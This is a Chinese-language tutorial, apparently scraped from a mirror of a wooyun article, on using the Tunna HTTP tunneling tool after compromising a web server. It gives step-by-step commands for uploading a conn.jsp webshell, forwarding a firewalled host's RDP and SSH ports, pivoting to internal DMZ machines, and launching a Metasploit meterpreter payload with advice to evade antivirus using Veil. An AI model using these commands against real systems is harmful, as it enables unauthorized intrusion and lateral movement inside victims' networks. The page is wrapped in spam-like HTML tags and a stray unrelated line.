<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            原文地址:http://drops.wooyun.org/tools/650

            原理:就是個HTTP tunneling工具

            #!php
             +-------------------------------------------+                     +-------------------------------------------+
             | Local Host                                |                     | Remote Host                               |
             |-------------------------------------------|                     |-------------------------------------------|
             |   +----------+       +------------+       |   +-------------+   |   +------------+        +----------+      |
             |   |Client App|+----->|Local Proxy |<==========|  Firewall   |======>|  Webshell  |+------>|Server App|      |
             |   +----------+       +------------+       |   +-------------+   |   +------------+        +----------+      |
             +-------------------------------------------+                     +------------------------------------------ +
            

            可以看出該工具先使用proxy.py監聽本地一個端口,然后連接部署在遠程WEB的webshell,遠端的webshell會把端口轉發請求轉發到本地或者本地內網遠程的主機,從而實現HTTP tunneling.這對于內網入侵來說,是很有用的一個工具.

            該工具看起來是不是有似曾相識的感覺,恩.其實和reduh原理是一樣的,不過tunna更穩定,速度更快.

            下載地址是:http://www.secforce.com/media/tools/tunna_v0.1.zip

            下面講解4個實例,就能掌握該工具使用方法了.

            實例1:

            網站對外只開放了80端口,其他的端口都是關閉的,通過CVE-2013-225得到JSP的WEBSHELL后,上傳conn.jsp,做轉發,實現連接本機的其他端口.

            直接掃描發現3389是關閉的

            [email protected]:~# nmap -sS -p3389 219.x.x.x
            
            Starting Nmap 6.40 ( http://nmap.org ) at 2013-09-26 22:47 EDT
            Nmap scan report for 219.x.x.x
            Host is up (0.0088s latency).
            PORT     STATE SERVICE
            3389/tcp close  
            

            通過webshell上傳conn.jsp到主機上,本地開始連接

            python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 3389 -v
            

            參數含義如下:

            -l 表示本地監聽的端口
            -r 遠程要轉發的端口
            -v 詳細模式
            

            然后本地執行

            rdesktop 127.0.0.1:1234
            

            就可以連接到目標的3389了

            如圖1

            實例2:

            對于有些服務,比如SSH,還需要添加-s參數,才能保證連接的時候不會中斷.

            python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 22 -v -s
            
            
            
            
            
            ssh localhost -p 1234
            

            enter image description here

            實例3:

            場景:已經得到DMZ區的一臺主機的JSPSHELL,該主機的內網IP是172.16.100.20,通過查點,發現DMZ區還有其他的主機(172.16.100.20),并且開放了3389,我們想利用HTTP tunneling,連接到172.16.100.20的3389,命令如下

            python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389
            

            這里多了一個-a參數,意義是要轉發的IP

            實例4:

            對于喜歡metasploit的朋友,該工具也支持,不過如果對方有殺軟的話,建議先用veil做好meterpreter的免殺.

            首先把tunna_exploit.rb拷貝到msf的modules/exploits/windows/misc目錄.

            cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc
            

            然后開始利用

            msf > use exploit/windows/misc/tunna_exploit
            msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp
            PAYLOAD => windows/meterpreter/bind_tcp
            msf exploit(tunna_exploit) > set RHOST 1.3.3.7  <-- 注意這里是指本地的公網IP
            RHOST => 1.3.3.7
            msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp
            TARGETURI => http://219.x.x.x:8080/conn.jsp
            msf exploit(tunna_exploit) > set VERBOSE true
            VERBOSE => true
            msf exploit(tunna_exploit) > exploit -j
            

            tunna除了支持jsp還支持以下環境和腳本

            conn.jsp Tested on Apache Tomcat (windows + linux) conn.aspx Tested on IIS 6+8 (windows server 2003/2012) conn.php Tested on LAMP + XAMPP + IIS (windows + linux)

            使用的時候需要注意:metasploit里的腳本只對應metasploit使用.

            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>

            <span id="7ztzv"></span><form id="7ztzv"></form>

            <span id="7ztzv"></span>

                  <address id="7ztzv"></address>

                      亚洲欧美在线